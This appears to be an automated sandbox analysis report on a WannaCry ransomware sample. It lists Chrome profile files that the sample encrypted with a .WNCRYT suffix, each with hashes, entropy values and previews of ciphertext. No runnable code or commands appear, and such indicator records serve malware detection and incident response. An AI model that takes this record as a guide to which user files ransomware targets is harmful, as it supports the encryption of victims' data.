                                                  Preview:WANACRY!.....v..xV.e..p.]..p1[...........k..,.....tV...9qCe.......8....*V.q\..z.P.^R.H..2,C.(n..|n...H]..B.....eG..N#....6........n..lK.W.........+v.$..N.Y......^N<T..0..}`....y..Pm...V$s....`..7;>g..u....._.'......A+#*.c{.Z...5.H....5....C.7s.0.....9..F..............+..?.,#.....<.....s)J.HY.]+i.|W...M..TR...C;.5i./.z.C....H\.. ..#k.d.7/U.4*].D.t;dw|.k&..B)s.x.E.f..}..&.t".+..K.....[aVo..D.....2...V3[..I.DN.....?..T...,..8....9..K.....J.Y.........../..w.Z.ya>........>$..*.i-.... ...5#......QN.j[.....X6. .k[.."..@K..<......V#..$.^.<.*...l....O..Jp_G....i....W&.. ....bb....w.a(...._..P.._sR....H9.#...1...Jp.k......}.nSz...%.N?.....!TPy-O.uw....L`..S..E.@..pBSCc3...b.ar.5.l....x.2O.!F2C....~..is[...d.6...@...M.k...IM.........L.$-....t..i.0....8Ci.h..6>G..|....-..4..Pv.V..0....A...,o..8:......b..TP.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.492683926355241
                                                  Encrypted:false
                                                  SSDEEP:12:bkEwShSV4iSlQsQfPhRemOBUnT0/FxFQgff4Zww65kn:bkNQSV4iS6sGh8mO24/HCgUww65k
                                                  MD5:1DEAAC0183F9993C789E86029DD820E9
                                                  SHA1:07F5F6FA3E7D9D789C180020EC0E728D9DE53467
                                                  SHA-256:964E02A65D849E35C1CB637A79C2D64696243D78162B25561502FBD294C68D70
                                                  SHA-512:D97D7886954F90B73F7EAEB8820E76FC601B1FDFE0547730CD3A1846FD16B07411CBF1B5A87BC78CFCAC455602320E5A7E469FA58D672B9B561F22A7592E924B
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........J.......Z2..;.W.4+.......lk....l4./.jy;.H.R......f..yE.3.[..R.*R....W.H.B......S....w/.\....Hpx....`.............sc@..c&O,.....c..I......n..........v.6.(.6.J)..5P....@....S..^IKA............;....,p*^....L.c..@=...D.....!$.[<Y.)......U.T.................4?..:..F......^a../.7............Y.b.(.e.!.l.7I....../].........r.b.......;...Dl....S...].hG.4......M6/?RB...%..........z.+.i..S....z.i....i@j..m^

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_close.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):536
                                                  Entropy (8bit):7.6338147758933514
                                                  Encrypted:false
                                                  SSDEEP:12:bkE4faKF+32a2MQ3uL8WbWo750LSnIVfTjYw2UbCD55vn0Vd:bkRft+3c6srSnIJXYwWtMd
                                                  MD5:4A7BA20B96F1A94A6002C8200FB384F3
                                                  SHA1:65ECF1CAE709B3CA193B5ED4F23891F29CA3A985
                                                  SHA-256:F20FB414ED16A15F019377DC1EE1ECF28BB30A049BF2200683ABBD7F714DAA26
                                                  SHA-512:40EE64D5DFA4CE69493D942C20A52459AE71D93CD38DD6E33E2AB06613A7AE32ABDF5365F9FD2EC5EB896981B0EA2C2B952089D5C0353CC16371045032F2AA95
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......V.......l].......x...o.i.M.:$Lo..L....i.....t1....v....h.U.|......].......6.!;,-a..&@........s..Rmcg.....J4...8y......r_..\.....<...{....{.\.W.@E.?hn....|8.!.Y.....L...v.=.....g.C!.d.!.W...~.\.....BRk.V..u.pN.mE.x........=u5.%..y=.q................y..........Z@.uzfG^m:#.....U..._./...._.G1.i.cx[s.....w...zl'....Hz..\J1Sz....Kd..v....w0.g...kYg.....}..4...|.i5r1...$..QP..h.....D..I. ..c>.?.s.....3V.=....2}R.N}q.>.c..X.O"zf.hl.,.F....P..O........?........{wf.x.$e.pN.B6....H..2....E

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_hover.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.396376988895496
                                                  Encrypted:false
                                                  SSDEEP:6:bkEBYhW0i3TPjMD7aunT26fclRZ5P3TxgkeSJKe2br425Q585SHj8imn5eBS26Q9:bkEz6fcLH7xh2/scP5Ta
                                                  MD5:F2490ACF3E714B969D0F30FE5860690C
                                                  SHA1:1C3A7CB3375387871888271372AC8059F7FA9921
                                                  SHA-256:DB1DC39FE5CF7D3C8B73BB30AD626D8463D13619BA4B6C84350F8E0E1716F90B
                                                  SHA-512:34D91E6CD824BE7D41322C0D166830A0B088BAA3B55090975396EBCE8A031093F547E9A40A316CE6705E2C2CD3E1F93E2FDC207D9EE0E206171102133BC3CEC3
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......a..Pq!r748..|....G.....q.~(F..K...O...~r7on.O..?..6p.g..2............`..}.u....p.?.k)...s/.G..`...^E....;..d.D.5v.k.G.t...,;.J,...T......O6..'n......I1.^x.c.k0..T../..g.8cr,..k".0k..Y...^....ig...KN..,?.....k..T.].....W...h.t.]i...\>..{9..h.............E~....!aLI.G]-..c.9.c.'.'..D\L<.<..;R.....t.......>..b~.ua"..@.k.D..;.ZZ./...hM.pc4...`..C.H...}.X)."w..d..N'O.J..s3<s.3.:v..`....S...#Y.q...'....&9..L.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_maximize.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):456
                                                  Entropy (8bit):7.465434005752753
                                                  Encrypted:false
                                                  SSDEEP:12:bkERBaxl1NjqLb6RQ7MoIrUIa7+00Ziu2RN2mLI7aWdU9iasn:bkdNjQb6mMoIta7+rZJONuOOms
                                                  MD5:1D38271D621F9E52B2D051118D39B77F
                                                  SHA1:A128EA20F83896A7508C8456B1B73F90CCE43C30
                                                  SHA-256:FAB53F422E9DBD82B02C953C893BAF438017674059EA2C0D3785790CCD94E82F
                                                  SHA-512:FBF740FB063BD4871B97C0926DDA59B54017F01E26043F4842BFB4CE94AF1AEB586B6F2493A422B5163BF201E8C3D718786002B3BD409297979EC7777C87CE4D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....l...Z....4..#...Y[./}UT....C..@.. .............H.QS..f..7..i.|.3wAw....s....~M..B.....3.ca....hG..........-.3.".C}F..!Z&........V.O{"......H&.NXY..>.N.{.... ...4.u.0.&J.....e.....,..n.......gu2$+.>i.x.3.+...M7.E(.E...,..mG......ys.'...9.s..!.t-R.e...............&...p.8+f....../%.Axh....9.SRg..Fs....*.....GA|Ej....:a.N... 9...........?Z..T.....-.MZU.o3_..0..T-..Y......LJAt..g-..4...2..."..[.xv...t.......\.F.O....Qs&..:.....e}

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\topbar_floating_button_pressed.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):440
                                                  Entropy (8bit):7.438321985755335
                                                  Encrypted:false
                                                  SSDEEP:6:bkEjTL0Wsx+vi6px/IBP+asE/6dSKJmLUnC7AA+6v/M5HvM5d/vsGkJnd7HxAxB9:bkE3j6E8PlnyES8UC78LZOtsTjxAC2
                                                  MD5:9AA23BA282153EF3D4008C17D44B8FEE
                                                  SHA1:5E8D756E3A25954275A8B6694F2315C50048321A
                                                  SHA-256:EE30D2C5709D72BFCFFEF0C162796B334A457B3C283471189D9FA053DA698C11
                                                  SHA-512:66F682B04B3C4A18093C053A13DF24ABB1818A2D8A7E450CE45A0A6FA11E4E809D7D6F32DEA3B4BA833E69EAC797E099485CED261063D69CB3CE8229591B1CBA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....-V...`3.T..&....z.Nd.......T.Ca.G...L...jh6h..o..I.......=..q.z|....R|...E.....D'....W...o.V....[Wr...V...a..m.j.W.f.....m...f.F?oR...=3o.R..^@."Jw...(.i.?Xo...".....-........pt.....vD.X4.xT.Ya...I..j..J...o.3:.....:..m..N.....R.k.t..T..h..................(...N.a..Z..E;E...:.x.K..9..Gh[..e.3...%. ..)J.......f....t.p[.."..s}...aw.{w~2.......v4.....@.Z.J=..dO.4..%Y.T..... ,N.N60....N.o6.O%..=H../0

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\8.3_0\128.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):2296
                                                  Entropy (8bit):7.917278620903038
                                                  Encrypted:false
                                                  SSDEEP:48:bk486c9SI57yxKtZJQnUzyoYJKxSj576+QrLf6daCRR/2Jn:o4nzI57gK92qwJKxc+7PfTW2Jn
                                                  MD5:F7C79BE74EE69485179DFC0E9A10D8D7
                                                  SHA1:E7339DE2065EF33EC73AA47016514696137187C9
                                                  SHA-256:3FCC1D7D309904B290435689B3FF18F7497451FEDA7F09D75B9DC9BA6C5FFB7E
                                                  SHA-512:F0F87E27A1ABE7B581FC6822E1A235CC5834CB8CEC20908B9149FE33879F44394238F11C19E2627C1D66B47A6CBF2DF6101D6A11886026F1FBEE93A0FFF33091
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....!..]._I!..I<.`...Z..?..ai...>.dx.\....Xz.|..m3.8J.'Z....;...^..l..f-.O.....0...X...z....4.;...KP....{..?..P.(.A.UR.SLa....[.g.%.s.r..!._/2.#.V....Ngtk.p.y)1....0.........jV......3...h.....8...4u........~.._C..G?Z....x.t.0Q..?.J6.]..LQ...C.Y`.............ikD.. .W..4........'....eD..ZR..[..... *7..B.$2.N=...z..#}(........+.0[.*A.4.).}Fs....h......I....>..uj.p.:Eh.......!i.prZ.A.:...i~..=..g__......l......Tl..14...W.k...^.L9..4LO..d..V..u5...>.r:.5p.`..2^q..@..%$...x!D[.z$L.m'M .j..xS..?"gu.=4J.'.uD............5.T..Af......T..Un..8..7...............+...T.=.LdK.O..K...+!\...i.......1....l..r....lH.8..[.[......_17rc.%t..T.Bk.|I..9~.ZS......-a.*1|...E.j.-G.~{d.C.j...x..{a.,.......k.';I.../.Q.\.X....v.3...:....3..:N..mi..#./....\[N...-ekG..Z7My..+-6....W....s.WNt..m....b.,..Y.W.....O...4`.E63..m..>.|..Jy<......xt..X.n.......j.....|.x....&m....n..R.._M...s^3.}.(.n:....AY}*\.3........./......u.......)|.d.^l.@........7..i.a

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Service Worker\CacheStorage\7d1231262330823bd07f6259b80025388c6b86e3\index.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):376
                                                  Entropy (8bit):7.441785693644595
                                                  Encrypted:false
                                                  SSDEEP:6:bkEQ2vZhBc+r6LLZS4FQJUaFNlhQI06CpnaSiY5fch5L/iqXh9omL6J0C2hyg:bkEQ2BcUMLs4FU1/7QcS750zLqqbom
                                                  MD5:4C251277440ACBC8C3189F97B65AF726
                                                  SHA1:5E98D5DEFE5DD7D056350A0055D68AFE86011F34
                                                  SHA-256:9A0E2AD59773C0842BA2D564A02BD1AA10B16B541CA46FB2AF4ECE51A77F83F1
                                                  SHA-512:9B8EB4C38F597BBE27CAE2EF0765757754B3AC29BB15542543E379D1EBAFEBDFEC6318D65CFE066914650D3FF5E2674D1EC86242180D886860C7B8F6DB210EEA
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....y...)....m."..OE..%u%..1.... ....g..r<....(.IdRDo[...#.X.Q.....b`8...`7(.-................+.eT......H..&<T.I>v.P...D2....M)."..c...C.G..8....wI.<..S.. .....].UZ..#.1.......i........\.G.....=az....x^I{h....Jn....4.......j......k.m;.L..k....Z........f.(H...4Q.8.!..Gjs...w...6.#..."c)....Z.}...k.P'...&~.J...6...!..v$.\6.d...F&...z,..KSND..

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):28952
                                                  Entropy (8bit):7.993275457551298
                                                  Encrypted:true
                                                  SSDEEP:384:Kdq2XXKYzOC3FWJGYCSfZ3mdh3vk79LLncQaGzQ8ObCfW5GEHAEODzjqRPwM1nUQ:KgoXKQ+GG3mdhe3Pzn5S6zj2w4n7iA
                                                  MD5:3F0651599D9B56527535E15B676EABA8
                                                  SHA1:8996BC5A888D387F572A3DD0D5AA474DA010196B
                                                  SHA-256:F49234A51E929CA1CCD7FA10610733A493AA6F011A5AE804BE8BF6DA986E91CD
                                                  SHA-512:CDE942448B219AA7BCA6542B121935D234083459A049A9F08FA5B502AF93D3CA89A27E7048518921F3C5534AC4B48E02133FEB1C730C27432C9EA52B8DF1905C
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!......N..^.7.&......wk....r.E......0.fN....?.H..O..y.........{....+:..?....5..hL..a......J8..&..o.V.ZVU\.....Z.f.{...E.l.lp....r].b..wQ|X:..8.H.m..SD.O.......J).v.Y.`.....#...oT[..H..$..R.q....L...,^0YK...L...~.m..x.yq!.k<.W.Zw.d........~.{(.q..DS.....p......O..%T.....y.m..}..xEK..*,a.....V...z.}.......6zoj....V.!+.g.......)k......T....Q...Io]..{.B...$....fI.....dv>.n.y..w...fq/.J.g.T}GVn..$ AN+....;.o..Ke4..R...5..B..n.c.q.?#./.l...b.Z.<R.....{`c..q,.J${.R;.....;..d......zi....^].w.....I.....<Rc.......K..K3..<Nnn.Ahx.3.../...k.....9of...l.4...5x..}.P7.A....f...4..f~.._t....R..R.."<]D.7...+........_.....4q.u...U....3.II'y.(.][.9...k&.,.X!.w.......s.r......I..6X.!.t...A..............qZ.9...y..y...+...i.Y.|....v.{...N.xlFj..4X.{.E..L...{.......%....C...........j..q.)...{...}).YK>].j.uZ4.:....3..F92........0.Mw....P...~Y.NZ..Y..W.z@:.....hL....PC.....5..q...s:.[.E.G_..Ly....9L%......w.....^nu......9#......6..O...w|[;Vz.D.hV.f..

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):16664
                                                  Entropy (8bit):7.98715205887518
                                                  Encrypted:false
                                                  SSDEEP:384:MWJz+Qyy1yFW0UelK+KR5qaftMMPsPbEucv+rV0qid4rlUip:8QysAgbREa1dr1Nd4rl7
                                                  MD5:DCC79561798ED7E67C5542C56C870D6C
                                                  SHA1:0F8AD71469026BD327F40BBE429B0A66A588600F
                                                  SHA-256:3EE06FBE538E75BBA6CD88AFB4EB567D71D50C3551B46FD4E2FCA1F90772496B
                                                  SHA-512:D562093A4B48CAE7949BFEA29B64CFAE996D44334B39540C3F0C4CC976FF36993525B1C9559A007036F4F0952F17E010C202B4D8914DBE7CCC32BC97C359255E
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......an....+6.m7..-....0.+`...Nn.....po...E..o.}&.]..zu..l....A..?%.....R.....9.....q.E..z.hq.D.?...n.b....|t....s.D.p..._....U......K.....h.......}...[.t"....K..MR+.....&.9.e..).....".u.8._!=..X.....{.WM....Tn........\..xg[C...t.H(.U..D2.+46g..P.'X.......@......?...>.U]s.$/.s.@.K.o.V..7.4...4.e:...%\r.5.8....b.e..../.m..%..Q3.4.i.?...(NLo.N[ij...2....3.;.d?.F.eO..J.z.uL...~-....g~...g...(8J...:j}.?6......k...R..0W..-.;..{..f.k..].....yb../?<....r,.R..1.....K.....A.!DqhUi...J.....g.......#.]H.5.#......s.~.....S7j...).JqI)e.".(....x..A...1l...+.:......d...%.../...jv6`..Y.f.(H..j..!z|.p.#=6..`...tSX..H...o......d..J...[K.A.0p..x.........(si..?.c....>u.CDO.AH.B...G.....(.....=0=mB'..=H..;@Zu.".S/U..@.!.{N..Y/_u.hoR..?.....{..._...p.h.w!....Yu.....]..LbLp.......ld......y....?qpI.).5..g...'.%.k9$U.,....PZ?*!..>.4.s.F.'#:gj..JT.d.cYd~..}.....T..3.....s......,."....CG.'...%.............j.J2...mY.-.#G..2.s.d.3..tD...6!cE..#t.z.+...4.....*..k

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\9.29.4\LICENSE.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):24904
                                                  Entropy (8bit):7.993469822656297
                                                  Encrypted:true
                                                  SSDEEP:768:Dd7c7w8l6WGw2KjoFtVbov69BGeGjaF2I:Dd7Po2So1boi9BdiYL
                                                  MD5:89E4BF8294B2C04B94D73D82783147E8
                                                  SHA1:CA9F8F445DF01B85250071761628F0D80C0DD437
                                                  SHA-256:6BEFE0B9479BB464650226DD30EADFDF4806AE88E224F418D971DBF2CD7A68AD
                                                  SHA-512:3438DB876FF6C2E6F682235EC4F7C8DDF045219CA2CF9C92B3CFD65DB01921D6C14E21C98E1C38FEF3E12FB8479558773220153DAF6EC86CEF7FB83F215BE815
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......q..dK8F..7./..]...G....&.g....X.........v4._.%..5..g"`.....5.H6~&...I..v.....J...H.T.D.q.+d......j\....%....e.....N..t@.g..l*....[. ....+.N>7.z.....>.7.8......}..5...TX.E...#...2k8j...q.).j.Z.../q.........7Q."n.}.&.:~K9...)b.1.*N......F..../`.......%....&w..UD......4..V.. ......?....e..@.|._=[....=.x...S0....F.>.b.!;.....MuuM....;[.q."..|..........N!E.W...-...O4...)yBy;..<6?.tw.,&..bH..8L%..t.a..c.5.C.U6..^.."...i~-.`z".,.@k..+.h...w.'..t.}Ed....x6f..L...j:.>V.Ln...X.W...9./nq..Z...<.;{.GX.?L.{..V....>....w..K[.... ....^[.o.^.....u5......D...>...l.&. .B...1.k...7T.d~b.DY...G.S.V../......vCB...{.2A....}.c..EO..#.*..{i.#7r.....c,>....$^...6.Gt...d3+..8.,.......t}....l.kBu....`.t/.&..bD....*..M/...bW.E:k..R.....S.S.....A.D\....2m.....L..m.5..$..I~n-t....Q..6*...+DP5./V.....G("..$....<*H../.7.e..0..]@.Kpt..IR.f.9.....|./.$P.}.X'$.{-rB4.#.-...-+............._~.W8.......?vWg.M..QBX.P.5.n...F.$(.1.]P.....E&....+{).y..

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):277304
                                                  Entropy (8bit):7.999290034469061
                                                  Encrypted:true
                                                  SSDEEP:6144:qz3fqepKhhVKR2mRFzCX/YRPGFWgfI6cMom3AQ:qz3fqeshhER2mzXxgfmm3AQ
                                                  MD5:A6E6D9A17297C4411585E766BA818F1B
                                                  SHA1:5E687B2167BE9D775310D394FA2AB3A6EF8449E8
                                                  SHA-256:318317CC17E423E1C249FE01F28EBDD2641B8F0E9E9E7A84A99DD343873FD56D
                                                  SHA-512:3C85C72F2809053D6B51526CFFD12ED87E455029EB5EFC95AE2514BF37277272E89134898D8142BB4FBC86A1CC90778C23B07F6DF816B7C39F849AC10E9792B4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!........7.2........&.,|/...O..=.........n]..F......Wk.B..Jm.!].....Ioh&.rep...pS..E..... ......o..Z......|.B+..!+.. .....).....w..u.]&.d.C.ER...6..I..v..P..4..'..x.W~R...SWQn$EZ./..j..._A..?.Yv..R.<.....>A.A.@)...]..X.v8F]?(*P...o.>..,j..l...%>....$.....:......):.....X...........M."-..7R..E.gD..R..o8@...'.8..G.Z..bi.......=}..a .V'..~jlL.P..A...:.......y8s;..X..*|"GK..~...z.M..;..*z(.:......B%g9+f.(k!1.}...'H4i.z U...]X".os.A*r.CK.D.....Jl.....U.....+..!.._.J.5{../J..?.y.p.>.<..^.n-E.9....W..,b1<.M..mm-.`...b.......;._u!.m]..B...A.?.W....,...P....~#...cf..2.`.@`.....m..SL..J...bV..2.4i`.5AU......Y..xw.....[..o..b.T.*>..7.2.xT..J{.@..K.:..IH..{.A.....6....H...q.:..e._'W.@B........m...".I^..[...X.3.6...%K..2..mq.d../..Ge.`o..Sl..=.\.>)..L2..I......\Y.>..x.1.Y9F..J=.fk...v.L...M,x......H..t........;h".aG...+.......z..$>.+.n...>.q....@.{.c.AV..B.{{q..D}.,.s.`w.@.9./>.-..)......5.........5...p...R...v.&v...I......eo..Dq.z.%

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\female_names.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):27000
                                                  Entropy (8bit):7.993109225418807
                                                  Encrypted:true
                                                  SSDEEP:768:qO9/vxTYkamH8Rw6va2NwUla+aFuZHECnMO5PRzHD1:qOzTEFv3PLHTnMcPRLD1
                                                  MD5:0CFF5466F813801FE669108FC88EFA6B
                                                  SHA1:DCDC816AB4BC7D5A543667B56B723461552BF557
                                                  SHA-256:A48413FE07FA9F6F5009446FE9556B2FEEC7C4084E16ADDF8895E43E824A53AB
                                                  SHA-512:44124DEEA29D6AFCB8B0A10D22C82A506EA6B6BC901643F7EB3FA208F97290881888452E27B0C3605CCD4B793C55BA69FE0F3A87296939A96D825B40CB78118D
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....b%68.w..2.e.Mcb.F.Yw.hH..wkZ...g.~.Zcy...j.....[=..T.?9I...c.Q...e.....[..$P^.H..S.. .<...rx...!.[......MS,y9q$.%.....u..^.8>..O.K.-.`..E`..#d\a~.......o..H.2._XlY...*..^/OO&..ogT.B6....K...DE.Z2|...-.....M..P..9U....|.{P1.0.....i:..>..z...A..e.....Th.......z......S.T...|2...:......Z.).oeL.Q&.1...N.......D.7.t.6.;.........D}..B...aC_A.0...`.5.....A1..:...}4".b..%)...LQ.eTB."...3y..:.....O.NWoHf.%3?....g.5..+ .N....f^..s..J.o.......a..fbn.kJR]0..l......~K....I".....Q.u.".Oej".:....!....j.W.9."....J.D"H?......it.Ur......I.$L.~......z.O~svE..6..#.H'-5...k+v.... x.?u..._....m.8.0.. ..".P.......WK..}1T%_...Jv.h..........z........O..<;X.l..vA..\........Du-Q.j....z1I....h`.U.s...,"...7.....`\...Q..j.o.l.?.Z%.{.u..\,M.>.........3 ,8.A.......{...X...e.o.{.N.....M0...<.<.?..@..i..d.=.T.@?.G...E........M..0.......y..H.M..#.Z..x.O.\W.=..........zv.Y\....pO!A...xvy.W.qi......Ud.&K:.>x.i...-.hv.y..k..I....w..g...sB.6.........D.S.b.6.H...+.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\male_names.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):6952
                                                  Entropy (8bit):7.971712427241319
                                                  Encrypted:false
                                                  SSDEEP:192:9jv1QnC9dwNdKshSl+oy+7hBKvkPP0iTo:9jvGY6OshSlHZzZTo
                                                  MD5:C19982C11E53BC5D6097817039924AEF
                                                  SHA1:112066DE1B23DEACFE921CE4CE6A801A8F06AD26
                                                  SHA-256:CAC3FCE8B74A8E30097FC695D9F5816B2DD73FC81231CE13BA367DAFBCA24690
                                                  SHA-512:B3049A9975179A0A23E4D7205C93BCF260FE5949A1BCB9A6E83929C1652C3D046F28FB612CA6AA4476EB3274D9EF843E0C3AB77E31A80E5374B437122C36882D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.........hs.D.7..Q.2..}..1.4..o...U."..m........z.Ux.Z1^yx.c...m..d._..6!~.b.txe....[[.....yC..{uR.H0..W..+.m.N..<...s....fr;.n......WD...`9...6........+..9~...|.....}...S^.E....J...8W._e...v`X./.?A..m..f9.4_.5.;......'.....N;.5.BB(~..F.;.\. x,..\%s$................^..)...%.....}.........#.;..q.-...>q.....]q5.c...k_.2 ............p..i....xl.F...,.b.....N.e.....T k..).p....)..1..m...:..J.,L.8.4.1J.3.....&..R]./..Y6a9S...5.u......y$.j.:s#..O....:IF..d~..!`..d.............]=.. ...@.....n|.@n.......4/...b'.-v.7..& ..a.SL..e...Tt.s.....6.._x.PX...%EN...1...Td..A........j..[.k..Oy...'.D..V..C..B.......W?.qN.@.....TyM..j...P.9pB.g.z.W....+."`......]c4..m?.$y2A.....0....@......J<.~.5@.A.X.m...b.>..\.LI.78.......!-z[.!..gz4M......3E.`..}...{.v.T}....'.6..8..g.v=.Hm.d...w.....c]O.. .}|N..:y...a...A[)x.....QZ+.o9t.Lh.'...f.t...ET.../..0....p ...t.X(...E.......?8h.......G....F.M.3.....9.E!c.Z..T.X.<?..>..}..J.m.@..Sm.m..k..I]8;........x5.p.g8..CS.@=.

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):242232
                                                  Entropy (8bit):7.99934672493712
                                                  Encrypted:true
                                                  SSDEEP:6144:HksNCvEXXCohEMSVazq+n6L9+hBVEOaVyU:HJNXrRSVaO+n6L9+h6VyU
                                                  MD5:733449179E12EC54B3EEE6C519258302
                                                  SHA1:BCC880D2C1EBC655375294A8A37DB0CF038746C4
                                                  SHA-256:099FCB2412C7CD8E7B0E4C595CEECE3BB968226ADF7DAB696E56B9E4E80839A1
                                                  SHA-512:118588FF814D6F1E4887DA166461497060AFE439F888C23FC3B6E33F16156740C2F5D26CB5F6225B7ED10F181D8DA05746105703E63D6FA756EF8C8326357DE4
                                                  Malicious:true
                                                  Reputation:unknown
                                                  Preview:WANACRY!....I..$..(.}...Q.B.&[."..QL[.....hibh..L....J...v:..@&..+d..........1..!.....9T2A.@.c3.p........{..{x.,...0y....6V.*...\...=.i..........4.WW....C.c..G.>...,8ID...[k.S... ...........><f3..A....ugH8....@...85...h..D3.R0.y..?.:....|....6v...N......................2:&[.y+...G..m?.O...j7i<.`l.n.v.&.......U...v.....@q..<.u.q5...Ath...l..N%......K..3....N..........CV..r7a..o.e......=#.}..\.L..-..B..8...).y..L....Z.E.~..j9...5BQ..R.w.W...f....._o#.@..{........kdZS[...T..._Y..M..V...?9..qm.jf./..r8..57......cl.....yh..\@..D.......XN9......l.A....m...7.l...*~....c.\...P...&.".. .Lx...%zU}.Dd.Y.m..'.T..!...w'.[.....]..o.(o......2..:.....fI.....A....zZ|.U..F.{.r.*..x[...[......W.AQ.......|t!;. .j.(-*...)1.<.y-.w.H....3YM(.x$h.$.Qm9....L.y.iHJ..tXUT/QC-..\.+.qE...#.O\2N>Ev....k....v..*.x..rU.p.....J.uo.@f&y.$/..H.8.....{/...NY..}@.......RY..E..i.._.0.....&1h.4..X?........O.....W.....P^.!.r.u....De2RJ..g.....?^sIjz..]......5.u...HZ..C.+h<...

                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):76360
                                                  Entropy (8bit):7.997750798749787
                                                  Encrypted:true
                                                  SSDEEP:1536:LItgB3fBBDtD6NakCktxlAGA9wyuEPvOT4nvewtYozeYPV8:LItgdB/D68k/5ZEPmT4nviozef
                                                  MD5:8AC7E5A225BE5170A27ECBF89BD951AE
                                                  SHA1:59ED9E30627A096F05A890A75DA8A994B31312D0
                                                  SHA-256:01528597187765C62AAA0185AC62C52387316A37878EF5238703382DF7ED1EA7
                                                  SHA-512:5D975E70956A1E4A14599BFB46C68C75243C79C6F5DCCE78A6F5BE7AC95F9F6DC71A20F08DB3A1ECE3DBE7C1748169C145CBF5896FAC61E82C479FD8FA6A9FAB
                                                  Malicious:true
                                                  Reputation:unknown
